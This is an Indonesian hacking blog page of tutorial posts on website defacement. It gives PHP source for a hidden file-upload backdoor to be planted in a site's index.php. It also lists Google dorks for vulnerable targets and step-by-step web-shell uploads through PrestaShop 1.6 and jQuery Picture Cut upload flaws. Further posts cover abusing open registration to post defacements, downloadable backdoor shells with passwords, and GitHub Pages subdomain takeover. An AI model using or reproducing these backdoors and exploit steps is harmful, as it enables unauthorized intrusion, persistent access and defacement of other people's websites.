Minggu, 30 Desember 2018

Membuat Hidden Uploader

on Desember 30, 2018 with Tidak ada komentar

Hidden Uploader
Script PHP

Yosh dimalem taun baru ini gw mau kasih tutorial cara membuat hidden uploader.. Keuntungan pke hidden uploader adalah akses kita gak gampang ketikung alias kehapus:V".. Ok lngsng aja simak :

Copas Script nya dulu ;

<?php

if(isset($_GET["uploader"]))

{

echo"<font color=#ffffff>".php_uname()."";

print "\n";$disable_functions = @ini_get("disable_functions");

echo "<br>DisablePHP=".$disable_functions; print "\n";

echo"<br><form method=post enctype=multipart/form-data>";

echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";

if($_POST["k"]==upload)

{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){

echo"<b>".$_FILES["f"]["name"];

}else{

echo"<b>Gagal upload cok";

}

Kemudian tempel script nya dibagian file "index.php" atau apalah.. Kemudian cara aksesnya "http://webnya.cuk/?uploader" kalaw kalian sisipkan difile lain bkn diindexnya yah tinggal "http://webnya.cuk/filekalian?uploader"

Sampai sini dulu gw.. Selamat mencoba dan selamat tahun baru..

#happy new years

#happy hacking deface page

Deface Poc Edit Artikel

on Desember 24, 2018 with Tidak ada komentar

Deface Metode
Regmem / Edit Artikel

Assalamualaikum,, malem ini gw mau kasih tutorial deface metode edit artikel,, bisa dibilang metode ini mirip dengan regmem ,, cmn kalaw metode regmem kita harus upshell ,, sedangkan ini kita cmn edit" aja,, gk ush pnjng lebar lngsng aja gan

DORK :

-inurl:/register site:ac.id

-inurl:/register penulis site:ac.id

AKUN GMAIL

SCRIPT DEFACE

Pertama Kita Dork Dulu Digoogle Kek Biasanya

Kedua Kalaw Sudah Nemu Target Silahkan Regrister/Daftar,,

Ketiga Isi Terserah Semuanya Kecuali : USER, PASS dan AKUN GMAIL..

Keempat Kalaw Sudah Regristrasi Silahkan Cek Akun Gmail kalian,, Kemudian Kalian aktifin dulu akun kalian,,

Kelima Tinggal Login,, Gunakan USER & PASS Yang Kalian Buat Tadi,,

Terakhir Tinggal Cari Tulisan "add artikel" Atau Apalah,, Kemudian Tinggal Tulis" Ajah,,

Done Bukan?,, Yah Walaupun Kgk Upshell Yg Penting Kan Deface juga,, Btw Gw Kasih Tau juga Kalaw Metode Ini Gk Bisa Dimirror rin,, mheuwheuwheuwuehuweuh Thankss Udh Baca,,

KUMPULAN SHELL BACKDOOR

on Desember 14, 2018 with 8 komentar

Shell Backdoor

2019 New

Yosh makasih udh sering" kunjungi blog sederhana gw.. Kali ini gw mau kasih beberapa shell backdoor yg fiturnya lumayan mantap.. Mulai dari yg mini sampe yg big:V".. Emng sengaja kgk gw encript buat lu semua bljr... Klaw gw kasih tpi gw encipt tu sama aja pamer ea Bkn berbagi.. Makasih juga buat 5YN15T3R_742 yg selalu bantu gw.. mhewheaauwhwuww ok chmod lngsng aja gan..

1. 404 Not Found SHELL

Raw : Disini

Download : Disini
Pass: 404

2. GOD SHELL

Raw : Disini
Download : Disini
Pass: GOD

3. Genji Mini SHELL

Raw : Disini
Download : Disini

4. Anime SHELL

Raw : Disini
Download : Disini
Pass: WIBU

5. TIREXSHELL

Download : Disini
Pass: ngasalshell

6. FEAT SHELL

Raw : Disini
Download : Disini

Okok mantap bukan?? Mangga didownload trs dipelajari.. Direcode juga gpp kok tpi jangan lupa share:V"..
Sekian dari gw.. Thankss

DEFACE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

on Desember 08, 2018 with Tidak ada komentar

CARA DEFACE METODE

RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

Selamat pagi defacer" indo.. Balik lagi diblog gagah nan mempezona:V".. Kali ini gw mau kasih tutorial deface dengan metode prestashop 1.6 arbitrary file upload... Btw nih nama metode apa nama plat nomer susah amat:V"... Wkwkwkwkkwk... Okok lngsng aja bahan - bahannya :

- Dork

1. inurl:/modules/columnadverts/

2. inurl:/modules/homepageadvertise/

3. inurl:/modules/productpageadverts/ 4. inurl:/modules/simpleslideshow/

5. inurl:/themes/warehouse/

- Exploit

(http://weblu/path/namamodelus/uploadimage.php)

- CSRF klik sini

- Script Deface + Shell Backdoor

Langkah - langkahnya :

1. Kita dork dulu cem biasana digoogle

2. Kemudian pilih salah satu webnya.. Kalaw vuln ada tulisan "error"..

3. Kalaw sudah nemu vuln kek gitu.. Pergi ke csrf .. Isi post filenya dengan "userfile" kemudian submit..

4. Setelah submit nanti pasti ada tempat upload dibawahnya.. Tinggal upload sc/shell kalian..

5. Kalaw upload tan kalian sukses nnti akan ada tulisan "succes:filekalian"..

6. Last cara manggilnya tambahin /slides/filekalian dibelakang websitenya...

Mhuehwuwhwuwhuh selesai gan.. Kalaw kurang paham chat aja :v.. Dan Jangan lupa

#Share & Coment ✌

Deface JQuery Picture Cut With Csrf

on Desember 03, 2018 with 5 komentar

Cara Deface JQuery Picture Cut

with Csrf Shell Upload

Malem semuanya kali ini gw mau kasih tutorial deface JQuery Picture Cut dengan csrf file upload... Metode ini bisa dibilang metode baru gan.. Soalnya baru ditemukan beberapa minggu yg lalu.. Ok langsng aja gk ush bnyk obrol:V".. Bahan :

- Dork

~ intext:/jquery.picture.cut/ "index of"

~ inurl:/jquery.picture.cut site:. com

~ intext:"jquery.picture.cut"+"upload.php"

- Exploit

~ http://webco.li/patch/src/php/upload.php

- Csrf chmod sini

- Shell Backdoor & Script deface

- Ketamvanan

Pertama Kita dork dulu digoogle seperti biasa..

Kedua kalaw vuln webnya ada tulisan "request method is invalid"...

Ketiga kalaw sudah nemu web vulnnya pergi ke csrfnya.. Isi post filenya dengan files[]..

Keempat kunci target kemudian upload shell kalian..

Terakhir kalaw shell kalian suskses diupload nanti tandanya ada tulisan "Error : fornato de arquivo descc"..

Mpsssh cara liat akses shell kalian http://webco.li/shellkalian.php... Setelah itu tinggal kita tebas index dah:V"..

Waduu gampang bukan? Yaiyalah ... Mheuwwuwwhuhw.. Segini dulu dari gw.. Sampe ketemu ditutor selanjutnya Jangan lupa share dan coment gan:V"..

Tips Bermanfaat Metode Take Over

on Desember 02, 2018 with Tidak ada komentar

Tips Deface Metode

Take Over

Hai Hai .. Kali ini gw mau kasih tips yg berfaedah banget buat kalian defacer-defacer indo pencari surga:V".. Mngkin kalian pernah kesususahan saat mencari target take over github bukan??.. Mngkin kalian pernah ngedork berjam- jam tpi gk nemu nemu hasil bukan??.. Jangan risau .. FALKA gans akan kasih tipsnya;(*.. Lngsng aja chmod :

Pertama kita buka dulu reverse ip Klik sini atau Disini Juga Bisa gan..

Kedua masukan target web dengan nama "pisikita.com" dan cari..

Ketiga pasti akan keluar bnyk target dan rata" masih vuln alias perawan:V"..

Terakhir kita copy salah satu web yg kita inginkan untuk kita cek 404 github pages enggk.. Kemudian tempel dan cek webnya di Disini Gan ...

Lah kalaw ada yg 404 gitu berarti tandanya vuln take over:V".. Tinggal kita eksekusi doank done:V"..

Okok sekian dulu dari gw.. Thanks

#Share And Coment

Seputar Dunia Hacking

#W3LL SQUAD OFFICIAL
#TIPS & TRIK ANDROID

Minggu, 30 Desember 2018

Membuat Hidden Uploader

Senin, 24 Desember 2018

Deface Poc Edit Artikel

Jumat, 14 Desember 2018

KUMPULAN SHELL BACKDOOR

Sabtu, 08 Desember 2018

DEFACE RESPONSIVE PRESTASHOP 1.6 ARBITRARY FILE UPLOAD

Senin, 03 Desember 2018

Deface JQuery Picture Cut With Csrf

Minggu, 02 Desember 2018

Tips Bermanfaat Metode Take Over